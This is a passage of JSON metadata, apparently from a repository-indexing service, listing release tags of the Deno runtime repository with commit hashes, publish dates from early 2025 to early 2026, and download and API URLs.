cies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https: